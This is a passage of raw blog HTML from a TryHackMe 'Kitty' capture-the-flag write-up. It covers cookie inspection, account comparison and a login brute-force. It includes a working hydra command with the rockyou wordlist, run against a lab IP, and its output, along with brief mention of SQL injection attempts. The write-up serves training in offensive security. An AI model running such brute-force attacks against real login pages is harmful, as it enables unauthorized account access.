src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?resize=1024%2C294&#038;ssl=1\" alt=\"\" class=\"wp-image-425\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?resize=1024%2C294&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?resize=300%2C86&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?resize=768%2C220&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?resize=1536%2C441&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?w=1666&amp;ssl=1 1666w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>There is nothing that stands out on this web page. Looking at the cookies, we see a PHPSESID cookie that is a randomly generated string. The cookie does not seem like it&#8217;s encoded in any form. Viewing the page source also did not reveal anything interesting.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0cbf0cf1&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0cbf0cf1\" class=\"wp-block-image size-full is-resized wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"602\" height=\"501\" data-attachment-id=\"426\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-8-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-8.png?fit=602%2C501&amp;ssl=1\" data-orig-size=\"602,501\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-8\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-8.png?fit=602%2C501&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-8.png?resize=602%2C501&#038;ssl=1\" alt=\"\" class=\"wp-image-426\" style=\"width:841px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-8.png?w=602&amp;ssl=1 602w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-8.png?resize=300%2C250&amp;ssl=1 300w\" sizes=\"auto, (max-width: 602px) 100vw, 602px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To further understand what vulnerability this web application has, we can try to create another account and then compare the accounts to see if anything odd shows up.<\/p>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0cbf131f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0cbf131f\" class=\"wp-block-image size-full is-resized wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"644\" height=\"499\" data-attachment-id=\"427\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-9-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-9.png?fit=644%2C499&amp;ssl=1\" data-orig-size=\"644,499\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-9\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-9.png?fit=644%2C499&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-9.png?resize=644%2C499&#038;ssl=1\" alt=\"\" class=\"wp-image-427\" style=\"width:839px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-9.png?w=644&amp;ssl=1 644w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-9.png?resize=300%2C232&amp;ssl=1 300w\" sizes=\"auto, (max-width: 644px) 100vw, 644px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s login with this account now.<\/p>\n\n\n\n<p>We get the same page but it is interesting to notice that the cookie value is the same for <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">ishsome1 <\/mark><\/em><\/strong>user as well! Also, from our NMAP scan, we know that the httpOnly flag is not set for the PHPSESSID cookie. At this point, we can&#8217;t think of anything else but try to brute-force the login page assuming the user name is <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">kitty<\/mark><\/em><\/strong>.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty]\n\u2514\u2500$ hydra -l kitty -P \/usr\/share\/wordlists\/rockyou.txt 10.10.113.181 http-post-form &quot;\/index.php:username=^USER^password=^PASS^&amp;Login=Login:Invalid username or password&quot;   \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-02-03 08:27:27\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/10.10.113.181:80\/index.php:username=^USER^password=^PASS^&amp;Login=Login:Invalid username or password\n[STATUS] 914.00 tries\/min, 914 tries in 00:01h, 14343485 to do in 261:34h, 16 active\n[STATUS] 913.33 tries\/min, 2740 tries in 00:03h, 14341659 to do in 261:43h, 16 active\n[80][http-post-form] host: 10.10.113.181   login: kitty   password: &lt;REDACTED&gt;\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-02-03 08:31:03\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Kitty<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hydra<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-l<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">kitty<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-P<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/usr\/share\/wordlists\/rockyou.txt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.113.181<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http-post-form<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">\/index.php:username=^USER^password=^PASS^&amp;Login=Login:Invalid username or password<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\">   <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v9.5<\/span><span style=\"color: #BABED8\"> (c) 2023 by van Hauser\/THC <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">David<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Maciejak<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">use<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">military<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">secret<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">organizations,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">illegal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">purposes<\/span><span style=\"color: #BABED8\"> (this <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">non-binding,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">these<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #BABED8\">***<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ignore<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">laws<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ethics<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">anyway<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-02-03 08:27:27<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DATA<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">l:1\/p:14344399<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">, <\/span><span style=\"color: #89DDFF\">~<\/span><span style=\"color: #BABED8\">896525 tries per task<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DATA<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> attacking http-post-form:\/\/10.10.113.181:80\/index.php:username=^USER^password=^PASS^<\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\">Login<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #C3E88D\">Login:Invalid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">username<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 914.00 tries\/min, 914 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:01h, 14343485 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 261:34h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 913.33 tries\/min, 2740 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:03h, 14341659 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 261:43h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">80<\/span><span style=\"color: #89DDFF\">][<\/span><span style=\"color: #BABED8\">http-post-form<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> host: 10.10.113.181   login: kitty   password: <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">REDACTED<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">target<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">successfully<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completed,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-02-03 08:31:03<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We found the password! Let&#8217;s try to log in as kitty now.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"657\" height=\"180\" data-attachment-id=\"429\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-11-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-11.png?fit=657%2C180&amp;ssl=1\" data-orig-size=\"657,180\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-11\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-11.png?fit=657%2C180&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-11.png?resize=657%2C180&#038;ssl=1\" alt=\"\" class=\"wp-image-429\" style=\"width:839px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-11.png?w=657&amp;ssl=1 657w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-11.png?resize=300%2C82&amp;ssl=1 300w\" sizes=\"auto, (max-width: 657px) 100vw, 657px\" \/><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>May be brute-forcing is not the way to go. The password we obtained may be the right password but it didn\u2019t do anything good for us<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>After logging in we see the above message. <\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"850\" height=\"497\" data-attachment-id=\"430\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-12-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-12.png?fit=850%2C497&amp;ssl=1\" data-orig-size=\"850,497\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-12\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-12.png?fit=850%2C497&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-12.png?resize=850%2C497&#038;ssl=1\" alt=\"\" class=\"wp-image-430\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-12.png?w=850&amp;ssl=1 850w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-12.png?resize=300%2C175&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-12.png?resize=768%2C449&amp;ssl=1 768w\" sizes=\"auto, (max-width: 850px) 100vw, 850px\" \/><\/figure>\n\n\n\n<p>We get the same message when we try to do an SQL injection attack. This means either we are not on the right track perhaps or there are some filters in place that are detecting the characters used in SQL injection payloads.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will try a different payload this time.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"422\" data-attachment-id=\"439\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-15-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-15.png?fit=1132%2C466&amp;ssl=1\" data-orig-size=\"1132,466\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-15\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-15.png?fit=1024%2C422&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-15.png?resize=1024%2C422&#038;ssl=1\" alt=\"\" class=\"wp-image-439\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-15.png?resize=1024%2C422&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-15.png?resize=300%2C123&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-15.png?resize=768%2C316&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-15.png?w=1132&amp;ssl=1 1132w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"314\" data-attachment-id=\"440\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-16-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?fit=1671%2C512&amp;ssl=1\" data-orig-size=\"1671,512\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-16\" 